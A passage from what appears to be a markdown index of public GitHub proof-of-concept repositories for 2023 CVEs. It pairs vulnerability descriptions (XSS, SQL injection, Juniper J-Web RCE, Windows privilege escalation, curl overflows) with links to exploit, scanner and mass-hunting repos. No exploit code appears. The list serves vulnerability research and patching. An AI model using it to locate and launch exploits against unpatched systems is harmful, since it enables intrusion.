- [leonardobg/CVE-2023-36144](https://github.com/leonardobg/CVE-2023-36144)
### CVE-2023-36146 (2023-06-30)
A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733.
- [leonardobg/CVE-2023-36146](https://github.com/leonardobg/CVE-2023-36146)
### CVE-2023-36158 (2023-08-03)
Cross Site Scripting (XSS) vulnerability in sourcecodester Toll Tax Management System 1.0 allows remote attackers to run arbitrary code via the First Name and Last Name fields on the My Account page.
- [unknown00759/CVE-2023-36158](https://github.com/unknown00759/CVE-2023-36158)
### CVE-2023-36159 (2023-08-03)
Cross Site Scripting (XSS) vulnerability in sourcecodester Lost and Found Information System 1.0 allows remote attackers to run arbitrary code via the First Name, Middle Name and Last Name fields on the Create User page.
- [unknown00759/CVE-2023-36159](https://github.com/unknown00759/CVE-2023-36159)
### CVE-2023-36163 (2023-07-11)
Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL.
- [TraiLeR2/CVE-2023-36163](https://github.com/TraiLeR2/CVE-2023-36163)
### CVE-2023-36164
- [TraiLeR2/CVE-2023-36164](https://github.com/TraiLeR2/CVE-2023-36164)
### CVE-2023-36165
- [TraiLeR2/CVE-2023-36165](https://github.com/TraiLeR2/CVE-2023-36165)
### CVE-2023-36168
- [TraiLeR2/CVE-2023-36168](https://github.com/TraiLeR2/CVE-2023-36168)
### CVE-2023-36169
- [TraiLeR2/CVE-2023-36169](https://github.com/TraiLeR2/CVE-2023-36169)
### CVE-2023-36250 (2023-09-14)
CSV Injection vulnerability in GNOME time tracker version 3.0.2, allows local attackers to execute arbitrary code via crafted .tsv file when creating a new record.
- [BrunoTeixeira1996/CVE-2023-36250](https://github.com/BrunoTeixeira1996/CVE-2023-36250)
### CVE-2023-36281 (2023-08-22)
An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This is related to __subclasses__ or a template.
- [tagomaru/CVE-2023-36281](https://github.com/tagomaru/CVE-2023-36281)
- [miguelc49/CVE-2023-36281-2](https://github.com/miguelc49/CVE-2023-36281-2)
- [miguelc49/CVE-2023-36281-1](https://github.com/miguelc49/CVE-2023-36281-1)
### CVE-2023-36319 (2023-09-19)
File Upload vulnerability in Openupload Stable v.0.4.3 allows a remote attacker to execute arbitrary code via the action parameter of the compress-inc.php file.
- [Lowalu/CVE-2023-36319](https://github.com/Lowalu/CVE-2023-36319)
### CVE-2023-36407 (2023-11-14)
Windows Hyper-V Elevation of Privilege Vulnerability
- [zha0/CVE-2023-36407](https://github.com/zha0/CVE-2023-36407)
- [pwndorei/CVE-2023-36407](https://github.com/pwndorei/CVE-2023-36407)
### CVE-2023-36424 (2023-11-14)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [Nassim-Asrir/CVE-2023-36424](https://github.com/Nassim-Asrir/CVE-2023-36424)
### CVE-2023-36427 (2023-11-14)
Windows Hyper-V Elevation of Privilege Vulnerability
- [tandasat/CVE-2023-36427](https://github.com/tandasat/CVE-2023-36427)
### CVE-2023-36531
- [RandomRobbieBF/CVE-2023-36531](https://github.com/RandomRobbieBF/CVE-2023-36531)
### CVE-2023-36643 (2024-04-04)
Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all orders from the online shop via oordershow component in customer function.
- [caffeinated-labs/CVE-2023-36643](https://github.com/caffeinated-labs/CVE-2023-36643)
### CVE-2023-36644 (2024-04-04)
Incorrect Access Control in ITB-GmbH TradePro v9.5, allows remote attackers to receive all order confirmations from the online shop via the printmail plugin.
- [caffeinated-labs/CVE-2023-36644](https://github.com/caffeinated-labs/CVE-2023-36644)
### CVE-2023-36645 (2024-04-04)
SQL injection vulnerability in ITB-GmbH TradePro v9.5, allows remote attackers to run SQL queries via oordershow component in customer function.
- [caffeinated-labs/CVE-2023-36645](https://github.com/caffeinated-labs/CVE-2023-36645)
### CVE-2023-36664 (2023-06-25)
Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).
- [jakabakos/CVE-2023-36664-Ghostscript-command-injection](https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection)
- [winkler-winsen/Scan_GhostScript](https://github.com/winkler-winsen/Scan_GhostScript)
- [jeanchpt/CVE-2023-36664](https://github.com/jeanchpt/CVE-2023-36664)
- [churamanib/CVE-2023-36664-Ghostscript-command-injection](https://github.com/churamanib/CVE-2023-36664-Ghostscript-command-injection)
### CVE-2023-36723 (2023-10-10)
Windows Container Manager Service Elevation of Privilege Vulnerability
- [Wh04m1001/CVE-2023-36723](https://github.com/Wh04m1001/CVE-2023-36723)
### CVE-2023-36745 (2023-09-12)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [N1k0la-T/CVE-2023-36745](https://github.com/N1k0la-T/CVE-2023-36745)
### CVE-2023-36802 (2023-09-12)
Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
- [chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802](https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802)
- [4zur-0312/CVE-2023-36802](https://github.com/4zur-0312/CVE-2023-36802)
- [x0rb3l/CVE-2023-36802-MSKSSRV-LPE](https://github.com/x0rb3l/CVE-2023-36802-MSKSSRV-LPE)
- [Nero22k/cve-2023-36802](https://github.com/Nero22k/cve-2023-36802)
- [ISH2YU/CVE-2023-36802](https://github.com/ISH2YU/CVE-2023-36802)
### CVE-2023-36812 (2023-06-30)
OpenTSDB is a open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. User unable to upgrade may disable Gunuplot via the config option`tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`.
- [ErikWynter/opentsdb_key_cmd_injection](https://github.com/ErikWynter/opentsdb_key_cmd_injection)
### CVE-2023-36844 (2023-08-17)
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environment variables.\n\nUsing a crafted request an attacker is able to modify \n\ncertain PHP environment variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\nThis issue affects Juniper Networks Junos OS on EX Series:\n\n\n\n * All versions prior to 20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S2, 22.4R3;\n * 23.2 versions prior to \n\n23.2R1-S1, 23.2R2.\n\n\n\n\n
- [watchtowrlabs/juniper-rce_cve-2023-36844](https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844)
- [ThatNotEasy/CVE-2023-36844](https://github.com/ThatNotEasy/CVE-2023-36844)
- [r3dcl1ff/CVE-2023-36844_Juniper_RCE](https://github.com/r3dcl1ff/CVE-2023-36844_Juniper_RCE)
### CVE-2023-36845 (2023-08-17)
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series \n\nand SRX Series \n\nallows an unauthenticated, network-based attacker to remotely execute code.\n\nUsing a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code.\n\n\nThis issue affects Juniper Networks Junos OS on EX Series\n\n\nand \n\n\nSRX Series:\n\n\n\n * All versions prior to \n\n20.4R3-S9;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S7;\n * 21.3 versions prior to 21.3R3-S5;\n * 21.4 versions prior to 21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S4;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3-S1;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3;\n * 23.2 versions prior to 23.2R1-S1, 23.2R2.\n\n\n\n\n
- [vulncheck-oss/cve-2023-36845-scanner](https://github.com/vulncheck-oss/cve-2023-36845-scanner)
- [kljunowsky/CVE-2023-36845](https://github.com/kljunowsky/CVE-2023-36845)
- [toanln-cov/CVE-2023-36845](https://github.com/toanln-cov/CVE-2023-36845)
- [halencarjunior/CVE-2023-36845](https://github.com/halencarjunior/CVE-2023-36845)
- [zaenhaxor/CVE-2023-36845](https://github.com/zaenhaxor/CVE-2023-36845)
- [simrotion13/CVE-2023-36845](https://github.com/simrotion13/CVE-2023-36845)
- [cyberh3als/CVE-2023-36845-POC](https://github.com/cyberh3als/CVE-2023-36845-POC)
- [3yujw7njai/ansible-cve-2023-36845](https://github.com/3yujw7njai/ansible-cve-2023-36845)
- [Asbawy/Automation-for-Juniper-cve-2023-36845](https://github.com/Asbawy/Automation-for-Juniper-cve-2023-36845)
- [jahithoque/Juniper-CVE-2023-36845-Mass-Hunting](https://github.com/jahithoque/Juniper-CVE-2023-36845-Mass-Hunting)
- [cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845](https://github.com/cyb3rzest/Juniper-Bug-Automation-CVE-2023-36845)
- [CharonDefalt/Juniper-exploit-CVE-2023-36845](https://github.com/CharonDefalt/Juniper-exploit-CVE-2023-36845)
- [iveresk/CVE-2023-36845-6-](https://github.com/iveresk/CVE-2023-36845-6-)
- [ak1t4/CVE-2023-36845](https://github.com/ak1t4/CVE-2023-36845)
- [0xNehru/CVE-2023-36845-Juniper-Vulnerability](https://github.com/0xNehru/CVE-2023-36845-Juniper-Vulnerability)
- [ifconfig-me/CVE-2023-36845](https://github.com/ifconfig-me/CVE-2023-36845)
- [e11i0t4lders0n/CVE-2023-36845](https://github.com/e11i0t4lders0n/CVE-2023-36845)
- [Vignesh2712/Automation-for-Juniper-cve-2023-36845](https://github.com/Vignesh2712/Automation-for-Juniper-cve-2023-36845)
- [functionofpwnosec/CVE-2023-36845](https://github.com/functionofpwnosec/CVE-2023-36845)
### CVE-2023-36846 (2023-08-17)
A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity.\n\n\n\nWith a specific request to user.php that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of \n\nintegrity\n\nfor a certain \n\npart of the file system, which may allow chaining to other vulnerabilities.\n\n\nThis issue affects Juniper Networks Junos OS on SRX Series:\n\n\n\n * All versions prior to 20.4R3-S8;\n * 21.1 versions 21.1R1 and later;\n * 21.2 versions prior to 21.2R3-S6;\n * 21.3 versions \n\nprior to \n\n 21.3R3-S5;\n * 21.4 versions \n\nprior to \n\n21.4R3-S5;\n * 22.1 versions \n\nprior to \n\n22.1R3-S3;\n * 22.2 versions \n\nprior to \n\n22.2R3-S2;\n * 22.3 versions \n\nprior to \n\n22.3R2-S2, 22.3R3;\n * 22.4 versions \n\nprior to \n\n22.4R2-S1, 22.4R3.\n\n\n\n\n
- [Chocapikk/CVE-2023-36846](https://github.com/Chocapikk/CVE-2023-36846)
### CVE-2023-36874 (2023-07-11)
Windows Error Reporting Service Elevation of Privilege Vulnerability
- [d0rb/CVE-2023-36874](https://github.com/d0rb/CVE-2023-36874)
- [crisprss/CVE-2023-36874](https://github.com/crisprss/CVE-2023-36874)
- [Wh04m1001/CVE-2023-36874](https://github.com/Wh04m1001/CVE-2023-36874)
- [Octoberfest7/CVE-2023-36874_BOF](https://github.com/Octoberfest7/CVE-2023-36874_BOF)
### CVE-2023-36884 (2023-07-11)
Windows Search Remote Code Execution Vulnerability
- [Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline](https://github.com/Maxwitat/CVE-2023-36884-Scripts-for-Intune-Remediation-SCCM-Compliance-Baseline)
- [deepinstinct/Storm0978-RomCom-Campaign](https://github.com/deepinstinct/Storm0978-RomCom-Campaign)
- [zerosorai/CVE-2023-36884](https://github.com/zerosorai/CVE-2023-36884)
- [tarraschk/CVE-2023-36884-Checker](https://github.com/tarraschk/CVE-2023-36884-Checker)
- [or2me/CVE-2023-36884_patcher](https://github.com/or2me/CVE-2023-36884_patcher)
- [ToddMaxey/CVE-2023-36884](https://github.com/ToddMaxey/CVE-2023-36884)
- [ridsoliveira/Fix-CVE-2023-36884](https://github.com/ridsoliveira/Fix-CVE-2023-36884)
- [raresteak/CVE-2023-36884](https://github.com/raresteak/CVE-2023-36884)
- [jakabakos/CVE-2023-36884-MS-Office-HTML-RCE](https://github.com/jakabakos/CVE-2023-36884-MS-Office-HTML-RCE)
### CVE-2023-36899 (2023-08-08)
ASP.NET Elevation of Privilege Vulnerability
- [d0rb/CVE-2023-36899](https://github.com/d0rb/CVE-2023-36899)
- [midisec/CVE-2023-36899](https://github.com/midisec/CVE-2023-36899)
### CVE-2023-36900 (2023-08-08)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [RomanRybachek/CVE-2023-36900](https://github.com/RomanRybachek/CVE-2023-36900)
### CVE-2023-37073
- [Hamza0X/CVE-2023-37073](https://github.com/Hamza0X/CVE-2023-37073)
### CVE-2023-37164 (2023-07-20)
Diafan CMS v6.0 was discovered to contain a reflected cross-site scripting via the cat_id parameter at /shop/?module=shop&action=search.
- [ilqarli27/CVE-2023-37164](https://github.com/ilqarli27/CVE-2023-37164)
### CVE-2023-37189 (2023-07-11)
A stored cross site scripting (XSS) vulnerability in index.php?menu=billing_rates of Issabel PBX version 4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the Name or Prefix fields under the Create New Rate module.
- [sahiloj/CVE-2023-37189](https://github.com/sahiloj/CVE-2023-37189)
### CVE-2023-37190 (2023-07-11)
A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Virtual Fax Name and Caller ID Name parameters under the New Virtual Fax feature.
- [sahiloj/CVE-2023-37190](https://github.com/sahiloj/CVE-2023-37190)
### CVE-2023-37191 (2023-07-11)
A stored cross-site scripting (XSS) vulnerability in Issabel issabel-pbx v.4.0.0-6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Group and Description parameters.
- [sahiloj/CVE-2023-37191](https://github.com/sahiloj/CVE-2023-37191)
### CVE-2023-37250 (2023-08-20)
Unity Parsec has a TOCTOU race condition that permits local attackers to escalate privileges to SYSTEM if Parsec was installed in "Per User" mode. The application intentionally launches DLLs from a user-owned directory but intended to always perform integrity verification of those DLLs. This affects Parsec Loader versions through 8. Parsec Loader 9 is a fixed version.
- [ewilded/CVE-2023-37250-POC](https://github.com/ewilded/CVE-2023-37250-POC)
### CVE-2023-37474 (2023-07-14)
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
- [ilqarli27/CVE-2023-37474](https://github.com/ilqarli27/CVE-2023-37474)
### CVE-2023-37478 (2023-08-01)
pnpm is a package manager. It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm. This issue has been patched in version(s) 7.33.4 and 8.6.8.
- [TrevorGKann/CVE-2023-37478_npm_vs_pnpm](https://github.com/TrevorGKann/CVE-2023-37478_npm_vs_pnpm)
- [li-minhao/CVE-2023-37478-Demo](https://github.com/li-minhao/CVE-2023-37478-Demo)
### CVE-2023-37582 (2023-07-12)
The RocketMQ NameServer component still has a remote command execution vulnerability as the CVE-2023-33246 issue was not completely fixed in version 5.1.1. \n\nWhen NameServer address are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system users that RocketMQ is running as. \n\nIt is recommended for users to upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x or 4.9.7 or above for RocketMQ 4.x to prevent these attacks.\n
- [Malayke/CVE-2023-37582_EXPLOIT](https://github.com/Malayke/CVE-2023-37582_EXPLOIT)
### CVE-2023-37596 (2023-07-11)
Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via a crafted script to the deleteuser function.
- [sahiloj/CVE-2023-37596](https://github.com/sahiloj/CVE-2023-37596)
### CVE-2023-37597 (2023-07-11)
Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete user grouplist function.
- [sahiloj/CVE-2023-37597](https://github.com/sahiloj/CVE-2023-37597)
### CVE-2023-37598 (2023-07-13)
A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function.
- [sahiloj/CVE-2023-37598](https://github.com/sahiloj/CVE-2023-37598)
### CVE-2023-37599 (2023-07-13)
An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory
- [sahiloj/CVE-2023-37599](https://github.com/sahiloj/CVE-2023-37599)
### CVE-2023-37621
- [MY0723/CNVD-2022-27366__CVE-2023-37621](https://github.com/MY0723/CNVD-2022-27366__CVE-2023-37621)
### CVE-2023-37625 (2023-08-10)
A stored cross-site scripting (XSS) vulnerability in Netbox v3.4.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Custom Link templates.
- [benjaminpsinclair/Netbox-CVE-2023-37625](https://github.com/benjaminpsinclair/Netbox-CVE-2023-37625)
### CVE-2023-37739 (2023-09-14)
i-doit Pro v25 and below was discovered to be vulnerable to path traversal.
- [leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below)
### CVE-2023-37755 (2023-09-14)
i-doit pro 25 and below and I-doit open 25 and below are configured with insecure default administrator credentials, and there is no warning or prompt to ask users to change the default password and account name. Unauthenticated attackers can exploit this vulnerability to obtain Administrator privileges, resulting in them being able to perform arbitrary system operations or cause a Denial of Service (DoS).
- [leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37755---Hardcoded-Admin-Credential-in-i-doit-Pro-25-and-below)
### CVE-2023-37756 (2023-09-14)
I-doit pro 25 and below and I-doit open 25 and below employ weak password requirements for Administrator account creation. Attackers are able to easily guess users' passwords via a bruteforce attack.
- [leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below](https://github.com/leekenghwa/CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below)
### CVE-2023-37771 (2023-07-31)
Art Gallery Management System v1.0 contains a SQL injection vulnerability via the cid parameter at /agms/product.php.
- [anky-123/CVE-2023-37771](https://github.com/anky-123/CVE-2023-37771)
### CVE-2023-37772 (2023-08-01)
Online Shopping Portal Project v3.1 was discovered to contain a SQL injection vulnerability via the Email parameter at /shopping/login.php.
- [anky-123/CVE-2023-37772](https://github.com/anky-123/CVE-2023-37772)
### CVE-2023-37778
- [jyoti818680/CVE-2023-37778](https://github.com/jyoti818680/CVE-2023-37778)
### CVE-2023-37779
- [jyoti818680/CVE-2023-37779](https://github.com/jyoti818680/CVE-2023-37779)
### CVE-2023-37786 (2023-07-13)
Multiple cross-site scripting (XSS) vulnerabilities in Geeklog v2.2.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Mail Settings[backend], Mail Settings[host], Mail Settings[port] and Mail Settings[auth] parameters of the /admin/configuration.php.
- [Phamchie/CVE-2023-37786](https://github.com/Phamchie/CVE-2023-37786)
### CVE-2023-37790 (2023-11-08)
Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.
- [kaizensecurity/CVE-2023-37790](https://github.com/kaizensecurity/CVE-2023-37790)
### CVE-2023-37800
- [TraiLeR2/CVE-2023-37800](https://github.com/TraiLeR2/CVE-2023-37800)
### CVE-2023-37903 (2023-07-21)
vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up to and including 3.9.19, Node.js custom inspect function allows attackers to escape the sandbox and run arbitrary code. This may result in Remote Code Execution, assuming the attacker has arbitrary code execution primitive inside the context of vm2 sandbox. There are no patches and no known workarounds. Users are advised to find an alternative software.
- [7h3h4ckv157/CVE-2023-37903](https://github.com/7h3h4ckv157/CVE-2023-37903)
### CVE-2023-37941 (2023-09-06)
If an attacker gains write access to the Apache Superset metadata database, they could persist a specifically crafted Python object that may lead to remote code execution on Superset's web backend.\n\nThe Superset metadata db is an 'internal' component that is typically \nonly accessible directly by the system administrator and the superset \nprocess itself. Gaining access to that database should\n be difficult and require significant privileges.\n\nThis vulnerability impacts Apache Superset versions 1.5.0 up to and including 2.1.0. Users are recommended to upgrade to version 2.1.1 or later.\n\n
- [Barroqueiro/CVE-2023-37941](https://github.com/Barroqueiro/CVE-2023-37941)
### CVE-2023-37979 (2023-07-27)
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions.
- [Mehran-Seifalinia/CVE-2023-37979](https://github.com/Mehran-Seifalinia/CVE-2023-37979)
- [d0rb/CVE-2023-37979](https://github.com/d0rb/CVE-2023-37979)
### CVE-2023-38035 (2023-08-21)
A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.
- [horizon3ai/CVE-2023-38035](https://github.com/horizon3ai/CVE-2023-38035)
- [LeakIX/sentryexploit](https://github.com/LeakIX/sentryexploit)
- [mind2hex/CVE-2023-38035](https://github.com/mind2hex/CVE-2023-38035)
### CVE-2023-38039 (2023-09-15)
When curl retrieves an HTTP response, it stores the incoming headers so that\nthey can be accessed later via the libcurl headers API.\n\nHowever, curl did not have a limit in how many or how large headers it would\naccept in a response, allowing a malicious server to stream an endless series\nof headers and eventually cause curl to run out of heap memory.
- [Smartkeyss/CVE-2023-38039](https://github.com/Smartkeyss/CVE-2023-38039)
### CVE-2023-38041 (2023-10-25)
A logged in user may elevate its permissions by abusing a Time-of-Check to Time-of-Use (TOCTOU) race condition. When a particular process flow is initiated, an attacker can exploit this condition to gain unauthorized elevated privileges on the affected system.
- [ewilded/CVE-2023-38041-POC](https://github.com/ewilded/CVE-2023-38041-POC)
### CVE-2023-38120 (2024-05-03)
Adtran SR400ac ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Adtran SR400ac routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the ping command, which is available over JSON-RPC. A crafted host parameter can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20525.
- [warber0x/CVE-2023-38120](https://github.com/warber0x/CVE-2023-38120)
### CVE-2023-38146 (2023-09-12)
Windows Themes Remote Code Execution Vulnerability
- [exploits-forsale/themebleed](https://github.com/exploits-forsale/themebleed)
- [Jnnshschl/CVE-2023-38146](https://github.com/Jnnshschl/CVE-2023-38146)
- [Durge5/ThemeBleedPy](https://github.com/Durge5/ThemeBleedPy)
### CVE-2023-38408 (2023-07-20)
The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.
- [kali-mx/CVE-2023-38408](https://github.com/kali-mx/CVE-2023-38408)
- [LucasPDiniz/CVE-2023-38408](https://github.com/LucasPDiniz/CVE-2023-38408)
- [classic130/CVE-2023-38408](https://github.com/classic130/CVE-2023-38408)
- [wxrdnx/CVE-2023-38408](https://github.com/wxrdnx/CVE-2023-38408)
- [mrtacojr/CVE-2023-38408](https://github.com/mrtacojr/CVE-2023-38408)
- [fazilbaig1/cve_2023_38408_scanner](https://github.com/fazilbaig1/cve_2023_38408_scanner)
### CVE-2023-38434 (2023-07-18)
xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.
- [Halcy0nic/CVE-2023-38434](https://github.com/Halcy0nic/CVE-2023-38434)
### CVE-2023-38490 (2023-07-27)
Kirby is a content management system. A vulnerability in versions prior to 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6 only affects Kirby sites that use the `Xml` data handler (e.g. `Data::decode($string, 'xml')`) or the `Xml::parse()` method in site or plugin code. The Kirby core does not use any of the affected methods.\n\nXML External Entities (XXE) is a little used feature in the XML markup language that allows to include data from external files in an XML structure. If the name of the external file can be controlled by an attacker, this becomes a vulnerability that can be abused for various system impacts like the disclosure of internal or confidential data that is stored on the server (arbitrary file disclosure) or to perform network requests on behalf of the server (server-side request forgery, SSRF).\n\nKirby's `Xml::parse()` method used PHP's `LIBXML_NOENT` constant, which enabled the processing of XML external entities during the parsing operation. The `Xml::parse()` method is used in the `Xml` data handler (e.g. `Data::decode($string, 'xml')`). Both the vulnerable method and the data handler are not used in the Kirby core. However they may be used in site or plugin code, e.g. to parse RSS feeds or other XML files. If those files are of an external origin (e.g. uploaded by a user or retrieved from an external URL), attackers may be able to include an external entity in the XML file that will then be processed in the parsing process. Kirby sites that don't use XML parsing in site or plugin code are *not* affected.\n\nThe problem has been patched in Kirby 3.5.8.3, 3.6.6.3, 3.7.5.2, 3.8.4.1, and 3.9.6. In all of the mentioned releases, the maintainers have removed the `LIBXML_NOENT` constant as processing of external entities is out of scope of the parsing logic. This protects all uses of the method against the described vulnerability.
- [Acceis/exploit-CVE-2023-38490](https://github.com/Acceis/exploit-CVE-2023-38490)
### CVE-2023-38497 (2023-08-04)
Cargo downloads the Rust project’s dependencies and compiles the project. Cargo prior to version 0.72.2, bundled with Rust prior to version 1.71.1, did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. To prevent existing cached extractions from being exploitable, the Cargo binary version 0.72.2 included in Rust 1.71.1 or later will purge caches generated by older Cargo versions automatically. As a workaround, configure one's system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`.
- [lucas-cauhe/cargo-perm](https://github.com/lucas-cauhe/cargo-perm)
### CVE-2023-38499 (2023-07-25)
TYPO3 is an open source PHP based web content management system. Starting in version 9.4.0 and prior to versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, and 12.4.4, in multi-site scenarios, enumerating the HTTP query parameters `id` and `L` allowed out-of-scope access to rendered content in the website frontend. For instance, this allowed visitors to access content of an internal site by adding handcrafted query parameters to the URL of a site that was publicly available. TYPO3 versions 9.5.42 ELTS, 10.4.39 ELTS, 11.5.30, 12.4.4 fix the problem.
- [miguelc49/CVE-2023-38499-2](https://github.com/miguelc49/CVE-2023-38499-2)
- [miguelc49/CVE-2023-38499-1](https://github.com/miguelc49/CVE-2023-38499-1)
- [miguelc49/CVE-2023-38499-3](https://github.com/miguelc49/CVE-2023-38499-3)
### CVE-2023-38545 (2023-10-18)
This flaw makes curl overflow a heap based buffer in the SOCKS5 proxy\nhandshake.\n\nWhen curl is asked to pass along the host name to the SOCKS5 proxy to allow\nthat to resolve the address instead of it getting done by curl itself, the\nmaximum length that host name can be is 255 bytes.\n\nIf the host name is detected to be longer, curl switches to local name\nresolving and instead passes on the resolved address only. Due to this bug,\nthe local variable that means "let the host resolve the name" could get the\nwrong value during a slow SOCKS5 handshake, and contrary to the intention,\ncopy the too long host name to the target buffer instead of copying just the\nresolved address there.\n\nThe target buffer being a heap based buffer, and the host name coming from the\nURL that curl has been told to operate with.\n
- [UTsweetyfish/CVE-2023-38545](https://github.com/UTsweetyfish/CVE-2023-38545)
- [imfht/CVE-2023-38545](https://github.com/imfht/CVE-2023-38545)
- [fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow](https://github.com/fatmo666/CVE-2023-38545-libcurl-SOCKS5-heap-buffer-overflow)
- [vanigori/CVE-2023-38545-sample](https://github.com/vanigori/CVE-2023-38545-sample)
- [dbrugman/CVE-2023-38545-POC](https://github.com/dbrugman/CVE-2023-38545-POC)
- [bcdannyboy/CVE-2023-38545](https://github.com/bcdannyboy/CVE-2023-38545)
- [d0rb/CVE-2023-38545](https://github.com/d0rb/CVE-2023-38545)
- [Yang-Shun-Yu/CVE-2023-38545](https://github.com/Yang-Shun-Yu/CVE-2023-38545)
- [nphuang/NS-Project-2024-Spring](https://github.com/nphuang/NS-Project-2024-Spring)
### CVE-2023-38571 (2023-07-28)
This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Big Sur 11.7.9, macOS Monterey 12.6.8, macOS Ventura 13.5. An app may be able to bypass Privacy preferences.
- [gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV](https://github.com/gergelykalman/CVE-2023-38571-a-macOS-TCC-bypass-in-Music-and-TV)
### CVE-2023-38609 (2023-07-28)
An injection issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.5. An app may be able to bypass certain Privacy preferences.
